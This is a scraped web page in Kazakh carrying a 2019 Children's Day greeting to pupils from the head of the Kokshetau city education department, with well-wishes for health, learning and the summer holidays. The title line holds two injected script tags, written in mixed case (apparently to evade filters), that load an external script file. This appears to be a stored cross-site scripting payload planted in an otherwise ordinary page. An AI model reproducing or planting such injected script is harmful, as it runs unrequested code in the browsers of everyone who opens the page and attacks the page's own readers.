Қымбатты балдырғандар, жас достар!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

31.05.2019

1 маусым — сіздер үшін ең маңызды күн. Өйткені, ол өздеріңіздің еншілеріңізге тиген төл мейрамдарыңыз болып есептеледі. Ендеше жадыраған жаздың алғашқы күнімен келетін тамаша мереке — Халықаралық балаларды қорғау күнімен баршаңызды шын жүректен құттықтаймын.

Денсаулығы мықты, білімді, жан-жақты дамыған, шығармашыл,  еліміздің тұғырын биік ұстайтын, болашағынан үлкен үміт күттірер  азаматтар болып өсіңіздер.  

Ашық аспан, бейбіт өмір, бақытты балалық шақ  және жазғы демалыстарыңызда жаңа  күш-қуат жинап, есте қаларлықтай қызықты да көңілді өткізулеріңізге тілектеспін.

Сүйікті Отанымыздың мақтанышы болып, жолдарың ашық, келешектерің жарқын болсын!

 

«Көкшетау қаласының білім бөлімі» ММ

басшысы                                                                               Б.А. Жусупов

Просмотров: 917


Пікір қосу



Деректерді қолтаңбаға қосу